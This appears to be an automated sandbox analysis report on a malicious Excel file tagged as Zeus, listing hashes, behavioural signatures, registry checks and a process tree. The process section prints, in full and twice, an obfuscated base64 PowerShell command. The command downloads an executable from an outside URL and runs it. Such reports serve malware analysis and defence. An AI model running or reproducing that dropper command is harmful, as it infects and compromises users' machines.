Analysis
- max time kernel: 134s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 15-12-2024 17:34
Behavioral tasks
- behavioral1: sample 486e3a18e708eec3e9f8d6b0e5adec6e3494be0b3813d3937881b6a626543421.xls, resource win7-20240708-en
- behavioral2: sample 486e3a18e708eec3e9f8d6b0e5adec6e3494be0b3813d3937881b6a626543421.xls, resource win10v2004-20241007-en
General
- Target: 486e3a18e708eec3e9f8d6b0e5adec6e3494be0b3813d3937881b6a626543421.xls
- Size: 60KB
- MD5: cb1b432c3c8341c03bd9c068e77b8483
- SHA1: 90e2fe9ae82c5643bd20729ee048088a38101fcb
- SHA256: 486e3a18e708eec3e9f8d6b0e5adec6e3494be0b3813d3937881b6a626543421
- SHA512: a08218d7ec69c7b5657c9b4771b5dae36abbd753b8f3360adb6e0b05e1cd0f4ff4a3019690cbd5ac1dacb73137c8e507d0215ee0f0af5530a631b26f68a0ff6f
- SSDEEP: 1536:cDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAXyrrgZ2vGqJZHxMi4ZOyzpGwS:cDZ+RwPONXoRjDhIcp0fDlaGGx+cL26O
Malware Config
- Extracted: https://a.doko.moe/aknxfz.jpg
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.

| description | pid | pid_target | Process | procid_target |
| --- | --- | --- | --- | --- |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4408 | 848 | cMD.exe | 81 |

Zeus

Zeus family

Blocklisted process makes network request (2 IoCs)

| flow | pid | Process |
| --- | --- | --- |
| 21 | 672 | powershell.exe |
| 25 | 672 | powershell.exe |

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE |

Enumerates system info in registry (2 TTPs, 3 IoCs)

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE |

Suspicious behavior: AddClipboardFormatListener (1 IoC)

| pid | Process |
| --- | --- |
| 848 | EXCEL.EXE |

Suspicious behavior: EnumeratesProcesses (2 IoCs)

| pid | Process |
| --- | --- |
| 672 | powershell.exe |
| 672 | powershell.exe |

Suspicious use of AdjustPrivilegeToken (1 IoC)

| description | pid | Process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 672 | powershell.exe |

Suspicious use of SetWindowsHookEx (8 IoCs)

| pid | Process |
| --- | --- |
| 848 | EXCEL.EXE |
| 848 | EXCEL.EXE |
| 848 | EXCEL.EXE |
| 848 | EXCEL.EXE |
| 848 | EXCEL.EXE |
| 848 | EXCEL.EXE |
| 848 | EXCEL.EXE |
| 848 | EXCEL.EXE |

Suspicious use of WriteProcessMemory (4 IoCs)

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 848 wrote to memory of 4408 | 848 | EXCEL.EXE | 86 |
| PID 848 wrote to memory of 4408 | 848 | EXCEL.EXE | 86 |
| PID 4408 wrote to memory of 672 | 4408 | cMD.exe | 88 |
| PID 4408 wrote to memory of 672 | 4408 | cMD.exe | 88 |
Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\486e3a18e708eec3e9f8d6b0e5adec6e3494be0b3813d3937881b6a626543421.xls"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 848
C:\Windows\SYSTEM32\cMD.execMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAcwBIAHoANABMAFAAeABfAFMARwBiAEYANQBNAGUAQwBIACAAKAAgACQAbABuADQARwB5AGwATwBfAGgAZwBOAHIARQBKAGkAMwB0AEQAdQA5AEEAeABuAEcAegBrAHoANwAzACAALAAgACQAdgBiAGgAZQBRAEkAZgBXADQAZQBqADMAbQBzAGgAVQBNACAAKQB7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAgACQAbABuADQARwB5AGwATwBfAGgAZwBOAHIARQBKAGkAMwB0AEQAdQA5AEEAeABuAEcAegBrAHoANwAzACAALAAgACQAdgBiAGgAZQBRAEkAZgBXADQAZQBqADMAbQBzAGgAVQBNACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAHYAYgBoAGUAUQBJAGYAVwA0AGUAagAzAG0AcwBoAFUATQAgACkAOwAgAH0ADQAKAHQAcgB5AHsADQAKAA0ACgAkAGcANQB4AGQAaQBhAEIAaABUAFoAVgB1ADQAWABXADcAMgBqADkAeABYAGsATwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAQQA2ADYANQA1ADgAWQBBADEAXwA5AGsAbgA1AHgAYQBmAC4AZQB4AGUAJwA7AA0ACgBzAEgAegA0AEwAUAB4AF8AUwBHAGIARgA1AE0AZQBDAEgAIAAnAGgAdAB0AHAAcwA6AC8ALwBhAC4AZABvAGsAbwAuAG0AbwBlAC8AYQBrAG4AeABmAHoALgBqAHAAZwAnACAAJABnADUAeABkAGkAYQBCAGgAVABaAFYAdQA0AFgAVwA3ADIAagA5AHgAWABrAE8AOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID: 4408
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAcwBIAHoANABMAFAAeABfAFMARwBiAEYANQBNAGUAQwBIACAAKAAgACQAbABuADQARwB5AGwATwBfAGgAZwBOAHIARQBKAGkAMwB0AEQAdQA5AEEAeABuAEcAegBrAHoANwAzACAALAAgACQAdgBiAGgAZQBRAEkAZgBXADQAZQBqADMAbQBzAGgAVQBNACAAKQB7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAgACQAbABuADQARwB5AGwATwBfAGgAZwBOAHIARQBKAGkAMwB0AEQAdQA5AEEAeABuAEcAegBrAHoANwAzACAALAAgACQAdgBiAGgAZQBRAEkAZgBXADQAZQBqADMAbQBzAGgAVQBNACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAHYAYgBoAGUAUQBJAGYAVwA0AGUAagAzAG0AcwBoAFUATQAgACkAOwAgAH0ADQAKAHQAcgB5AHsADQAKAA0ACgAkAGcANQB4AGQAaQBhAEIAaABUAFoAVgB1ADQAWABXADcAMgBqADkAeABYAGsATwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAQQA2ADYANQA1ADgAWQBBADEAXwA5AGsAbgA1AHgAYQBmAC4AZQB4AGUAJwA7AA0ACgBzAEgAegA0AEwAUAB4AF8AUwBHAGIARgA1AE0AZQBDAEgAIAAnAGgAdAB0AHAAcwA6AC8ALwBhAC4AZABvAGsAbwAuAG0AbwBlAC8AYQBrAG4AeABmAHoALgBqAHAAZwAnACAAJABnADUAeABkAGkAYQBCAGgAVABaAFYAdQA0AFgAVwA3ADIAagA5AHgAWABrAE8AOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 672
Network
MITRE ATT&CK Enterprise v15
Downloads

Download 1 (path not recorded in the report)
- Filesize: 60B
- MD5: d17fe0a3f47be24a6453e9ef58c94641
- SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
- SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
- SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
- Filesize: 1KB
- MD5: cf0e90fc630ff3e62a546f523321b7c7
- SHA1: 2b4808b1f535561fe5e044ad70bb4900d06dbc99
- SHA256: 069f3369c839f65aa2b713287b01f8b569af50c90dbfe4ad14e5bb7c8b901b77
- SHA512: 630d58b7e86da37a3e48af44e1aa1d580cff6d7ccc7969e1021b98a42a5ccbaa920e830e969bd70380c683d6f150bcc6ee9c604454205c38322db9b4d5412de0